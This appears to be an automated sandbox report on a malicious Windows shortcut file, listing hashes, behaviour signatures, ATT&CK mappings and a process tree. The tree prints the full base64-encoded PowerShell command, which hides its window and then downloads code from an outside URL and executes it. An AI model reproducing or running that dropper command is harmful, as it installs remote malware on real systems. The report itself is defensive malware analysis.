1b847caaf38348409a73720a12b873672ee5cc1be743cb62fa9f4097b6ff69fc

General

Target

434128856ff38548fe68606a28ac1d1e_JaffaCakes118.lnk
Size

2KB
MD5

434128856ff38548fe68606a28ac1d1e
SHA1

f5c7212d1823a383e3f0872c199c75d958816538
SHA256

1b847caaf38348409a73720a12b873672ee5cc1be743cb62fa9f4097b6ff69fc
SHA512

71c8b0fd6917c5ae7cd33efd493b7d77c8fade356321b2909619cd1aee696d401a0403352184b5448d12a2d2a8a3a3ec1ace38434251988e21b8447312f9f6b2

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://sepogy.epiain.com/v2/gl.php?aHR0cHM6Ly9zZXBvZ3kuZXBpYWluLmNvbS92Mnx4b3Vn%

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2692	powershell.exe
2692	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2692	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 1716 wrote to memory of 2692	1716	cmd.exe	29
PID 1716 wrote to memory of 2692	1716	cmd.exe	29
PID 1716 wrote to memory of 2692	1716	cmd.exe	29
PID 2692 wrote to memory of 2772	2692	powershell.exe	30
PID 2692 wrote to memory of 2772	2692	powershell.exe	30
PID 2692 wrote to memory of 2772	2692	powershell.exe	30
PID 2772 wrote to memory of 2832	2772	csc.exe	31
PID 2772 wrote to memory of 2832	2772	csc.exe	31
PID 2772 wrote to memory of 2832	2772	csc.exe	31

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\434128856ff38548fe68606a28ac1d1e_JaffaCakes118.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:1716
- C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" -en UABlADsAQQBkAEQALQBUAFkAUABlACAALQBuAGEATQBFACAAQQAgAC0AbQBFAG0AYgBFAFIAZABFAGYAaQBOAEkAVABpAE8AbgAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABTAGgAbwB3AFcAaQBuAGQAbwB3ACgAaQBuAHQAIABoACwAIABpAG4AdAAgAHMAKQA7ACcAIAAtAG4AQQBtAEUAcwBQAEEAQwBlACAAYgA7AFsAQgAuAGEAXQA6ADoAcwBIAG8AdwBXAEkATgBEAG8AVwAoACgAWwBzAHkAUwB0AEUATQAuAGQAaQBBAGcATgBvAFMAdABpAGMAcwAuAFAAcgBvAEMARQBTAHMAXQA6ADoARwBFAHQAQwBVAHIAUgBlAE4AdABwAFIAbwBDAEUAcwBTACgAKQAgAHwAIABQAHMAKQAuAG0AYQBJAG4AVwBpAE4AZABPAHcASABhAE4ARABMAGUALAAwACkAOwBpAGUAWAAoAE4ARQB3AC0AbwBCAGoARQBDAFQAIABuAGUAdAAuAHcAZQBiAGMATABpAEUATgB0ACkALgBkAE8AVwBOAEwATwBhAGQAUwBUAFIASQBOAEcAKAAnAGgAdAB0AHAAcwA6AC8ALwBzAGUAcABvAGcAeQAuAGUAcABpAGEAaQBuAC4AYwBvAG0ALwB2ADIALwBnAGwALgBwAGgAcAA/AGEASABSADAAYwBIAE0ANgBMAHkAOQB6AFoAWABCAHYAWgAzAGsAdQBaAFgAQgBwAFkAVwBsAHUATABtAE4AdgBiAFMAOQAyAE0AbgB4ADQAYgAzAFYAbgAlACcAKQA=
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2692
- - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fjn8rcnc.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2772
  - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES30A3.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC30A2.tmp"
      4⤵
      PID:2832

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES30A3.tmp

Filesize
1KB

MD5
070e0ff776db22dee78202a1400fa60b

SHA1
09f165125c6439d1ea0d189220edc053f5691c00

SHA256
314a9ca4bbc8b1efc01312a0b76bb0720f35644c14ee2db598118e820f412bac

SHA512
e920f7e671d249caf2fcebb1b00c2877b3f1cb68ee021b8f193ed22b314cfb0f2b86c084dfa69b547c7cbbf92b3ef67aa331a703d31d22e98d2f5028a8cf11d3

Download Submit
C:\Users\Admin\AppData\Local\Temp\fjn8rcnc.dll

Filesize
3KB

MD5
e3fa1771f2b9786b1b42a72e72f1fb45

SHA1
c49e7d0811b852c66467c124fee4c71a6cbad084

SHA256
23664d875065c6388c5be7926faedd0d1c2d7f71ce6154e9b2fd9580adcd5758

SHA512
d984aeae804c5ed51824e2fb201394677e0071493b7962c5e70cb59db42b0d6b02a5e36073531662d8252f8d6092dfceed4fc086b5037e717ce61fade39e70b5

Download Submit
C:\Users\Admin\AppData\Local\Temp\fjn8rcnc.pdb

Filesize
7KB

MD5
27a4396972872aed1aa2116d2a5bd261

SHA1
ce6208d46003f38f52537eb0faa49d66aaeae6e6

SHA256
ab2eb735c628f91a2d887f7de9681f998654f155224a6aeaa89dbb6aa3a26439

SHA512
f2e3a69b528714785968f78c23b19cfc34a0534f02d2f65e8e3590cc9589bd96f1e9df29bc14be088e72bfb3593d371daeb8ac44e4fc979e46b8db100b51406d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC30A2.tmp

Filesize
652B

MD5
f32e3228aff301f3766873384994e062

SHA1
bbc7e6f86f991733ada62b3993670f40b7a8673e

SHA256
5109fed0d7fd6546e6e02e5158af3e99ce54c1bd3910eadf4413c0ff8491e878

SHA512
4a564a954d077ed659f417800adde3f0bb4f4eab72d4c2f403a52a56bf71de9730594a28d3cd5fd8abb15acbd2c456834fbd68f61741c1cfeb8507513d92651d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\fjn8rcnc.0.cs

Filesize
187B

MD5
dd6ab2ff4c462389df4293eb25b3f523

SHA1
ffc70f2025d1c802400f1ac8d8721c88547fb4b9

SHA256
6a1f4fbc312ee4b5105106efb192b8f80574a5f796848ae01d516f5752e1b635

SHA512
47e62a33654cc4daba627d89e76d87bed2af5421ed8f52164d5a5104797535520e6638dc69242599dce1a7a350f94e181dde509587162dbf01349bc11e20b055

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\fjn8rcnc.cmdline

Filesize
309B

MD5
4f3339ef968a8ac564f395b42f2de4fa

SHA1
b1cd27aa05f952b26067febccfeb75a9079f1356

SHA256
529c28e58060b3f2462111caba68c8b9070c17ed5314a0fd068753e23971efb8

SHA512
69cc8988c9d125cd9bb252b68c9253052cffbfb78e9ceeca061c790f1075132f4156e17d4324a846d94c30465d6fd800d8539be0cad4dfdf46686a14791af377

Download Submit
memory/2692-44-0x000007FEF56C0000-0x000007FEF605D000-memory.dmp

Filesize
9.6MB

Download
memory/2692-45-0x000007FEF56C0000-0x000007FEF605D000-memory.dmp

Filesize
9.6MB

Download
memory/2692-41-0x0000000001EE0000-0x0000000001EE8000-memory.dmp

Filesize
32KB

Download
memory/2692-42-0x000007FEF56C0000-0x000007FEF605D000-memory.dmp

Filesize
9.6MB

Download
memory/2692-38-0x000007FEF597E000-0x000007FEF597F000-memory.dmp

Filesize
4KB

Download
memory/2692-43-0x000007FEF56C0000-0x000007FEF605D000-memory.dmp

Filesize
9.6MB

Download
memory/2692-59-0x0000000002960000-0x0000000002968000-memory.dmp

Filesize
32KB

Download
memory/2692-40-0x000007FEF56C0000-0x000007FEF605D000-memory.dmp

Filesize
9.6MB

Download
memory/2692-39-0x000000001B770000-0x000000001BA52000-memory.dmp

Filesize
2.9MB

Download
memory/2692-62-0x000007FEF56C0000-0x000007FEF605D000-memory.dmp

Filesize
9.6MB

Download
memory/2692-63-0x000007FEF56C0000-0x000007FEF605D000-memory.dmp

Filesize
9.6MB

Download
memory/2692-64-0x000007FEF56C0000-0x000007FEF605D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing